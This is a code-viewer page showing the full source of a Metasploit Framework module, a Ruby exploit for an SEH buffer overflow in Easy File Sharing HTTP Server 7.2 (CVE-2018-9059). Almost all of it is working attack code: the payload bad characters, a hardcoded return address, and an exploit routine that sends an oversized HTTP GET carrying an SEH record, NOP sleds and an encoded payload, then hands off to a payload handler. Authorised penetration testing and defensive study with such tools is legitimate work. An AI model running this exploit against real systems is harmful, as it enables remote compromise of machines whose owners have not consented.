Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/http/easyfilesharing_seh.rb
28170 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::Remote::Tcp

10
  include Msf::Exploit::Seh

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'Easy File Sharing HTTP Server 7.2 SEH Overflow',

17
        'Description' => %q{

18
          This module exploits a SEH overflow in the Easy File Sharing FTP Server 7.2 software.

19
        },

20
        'Author' => 'Starwarsfan2099 <starwarsfan2099[at]gmail.com>',

21
        'License' => MSF_LICENSE,

22
        'References' => [

23
          [ 'CVE', '2018-9059' ],

24
          [ 'EDB', '39008' ],

25
        ],

26
        'Privileged' => true,

27
        'Payload' => {

28
          'Space' => 390,

29
          'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",

30
          'StackAdjustment' => -3500,

31
        },

32
        'Platform' => 'win',

33
        'Targets' => [

34
          [ 'Easy File Sharing 7.2 HTTP', { 'Ret' => 0x10019798 } ],

35
        ],

36
        'DefaultOptions' => {

37
          'RPORT' => 80

38
        },

39
        'DisclosureDate' => '2015-12-02',

40
        'DefaultTarget' => 0,

41
        'Notes' => {

42
          'Reliability' => UNKNOWN_RELIABILITY,

43
          'Stability' => UNKNOWN_STABILITY,

44
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

45
        }

46
      )

47
    )

48
  end

49


50
  def print_status(msg = '')

51
    super("#{peer} - #{msg}")

52
  end

53


54
  def exploit

55
    connect

56
    print_status("Sending exploit...")

57
    sploit = "GET "

58
    sploit << rand_text_alpha_upper(4061)

59
    sploit << generate_seh_record(target.ret)

60
    sploit << make_nops(19)

61
    sploit << payload.encoded

62
    sploit << make_nops(7)

63
    sploit << rand_text_alpha_upper(4500 - 4061 - 4 - 4 - 20 - payload.encoded.length - 20)

64
    sploit << " HTTP/1.0\r\n\r\n"

65
    sock.put(sploit)

66
    print_good("Exploit Sent")

67
    handler

68
    disconnect

69
  end

70
end

71


72